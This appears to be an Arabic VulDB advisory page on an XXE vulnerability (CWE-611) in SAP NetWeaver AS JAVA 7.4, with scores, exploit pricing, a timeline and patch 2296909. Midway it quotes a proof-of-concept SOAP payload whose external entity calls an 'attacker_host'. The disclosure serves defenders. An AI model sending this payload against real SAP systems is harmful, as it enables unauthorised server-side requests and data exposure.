CVSS درجة الميتا الوقتية | سعر الإكسبلويت الحالي (≈) | درجة اهتمام الـCTI |
---|---|---|
4.5 | $0-$5k | 0.00 |
تم أيجاد ثغرة أمنية بصنف مشكلة صعبة الحل. في SAP NetWeaver AS JAVA 7.4. الثغرة الأمنية متواجدة في دالة غير معروفة من الملف /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn من العنصر BC-BMT-BPM-DSK. تعريف الـ سي دبليو أي للثغرة الأمنية هو CWE-611. المشكلة تمت مشاركتها بتاريخ 21/11/2016 بواسطة Vahagn Vardanyan كـ [ERPSCAN-16-034] SAP NetWeaver AS JAVA - XXE vulnerability in BC-BMT-BPM-DSK component / 2296909 كـ Mailinglist Post (Bugtraq). الاستشارة متوفرة هنا seclists.org. تم ابلاغ الشركة المالكة قبل نشر هذه البيانات.
يمكن البدأ بالهجوم هذا عن بعد. التفاصيل التقنية متوفرة. الهجوم هذا كان معقد جداً. البيانات تشير أن الثغرة الأمنية صعبة الاستغلال. التقارير تشير بأن الثغرة الأمنية هذه ذات شهرة أقل من المتوسط. هنالك إكسبلويت متوفرة. تم الإبلاغ عن ال إكسبلويت ويمكن استخدامها. سعر الثغرة الأمنية هذه بحوالي بـ USD $0-$5k في هذه اللحظة.
تم أعتبراها على أنها proof-of-concept. الإكسبلويت يمكن تحميلها من هناt seclists.org. الثغرة الأمنية تم استخدامها كثغرة هجوم فوري غير معلنة للعامة لمدة256 يوم. لكونها ثغرة هجوم فوري متوسط سعرها كان$5k-$25k. الكود البرمجي المستخدم بواسطة الإكسبلويت هو:
<ENTITY xxe SYSTEM "http://attacker_host";> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xmlns:xsd="http://www.w3.org/2001/XMLSchema";><SOAP-ENV:Body>
<m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>
&xxe;</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
أسم الباتش التصحيحي هو2296909. ننصح بـ تنصيب باتش لإصلاح هذه المشكلة.
منتج
النوع
المجهز
الأسم
النسخة
الرخصة
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍
CVSSv3
VulDB الدرجة الأساسية للميتا: 5.0VulDB درجة الميتا الوقتية: 4.5
VulDB الدرجة الأساسية: 5.0
VulDB الدرجة الوقتية: 4.5
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
متجه | التعقيد | توثيق | السرية | الأمانة | التوفر |
---|---|---|---|---|---|
افتح | افتح | افتح | افتح | افتح | افتح |
افتح | افتح | افتح | افتح | افتح | افتح |
افتح | افتح | افتح | افتح | افتح | افتح |
VulDB الدرجة الأساسية: 🔍
VulDB الدرجة الوقتية: 🔍
VulDB الاعتمادية: 🔍
إكسبلويت
الفئة: XML External EntityCWE: CWE-611 / CWE-610
CAPEC: 🔍
ATT&CK: 🔍
محلي: لا
عن بعد: نعم
التوفر: 🔍
وصول: عام
الحالة: Proof-of-Concept
الكاتب: Vahagn Vardanyan
تحميل: 🔍
تقدير السعر: 🔍
تقدير السعر الحالي: 🔍
0-Day | افتح | افتح | افتح | افتح |
---|---|---|---|---|
اليوم | افتح | افتح | افتح | افتح |
استخبارات التهديد
الاهتمام: 🔍الفاعلين النشيطين: 🔍
مجوعات الـAPT الفعالة: 🔍
إجراءات مضادة
المقترح: باتشالحالة: 🔍
زمن الهجوم الفوري: 🔍
مدة تأخر الإكسبلويت: 🔍
باتش: 2296909
التسلسل زمني
10/03/2016 🔍10/03/2016 🔍
21/11/2016 🔍
21/11/2016 🔍
21/11/2016 🔍
24/07/2019 🔍
المصادر
المجهز: sap.comاستشاري: [ERPSCAN-16-034] SAP NetWeaver AS JAVA - XXE vulnerability in BC-BMT-BPM-DSK component / 2296909
باحث: Vahagn Vardanyan
الحالة: مؤكد
تنسيق: 🔍
scip Labs: https://www.scip.ch/en/?labs.20150716
ادخال
تم الانشاء: 21/11/2016 20:57تم التحديث: 24/07/2019 18:27
التغييرات: 21/11/2016 20:57 (52), 24/07/2019 18:27 (2)
كامل: 🔍
لا توجد تعليقات اللغات: ar + en.
يرجى تسجيل الدخول حتى تتمكن من التعليق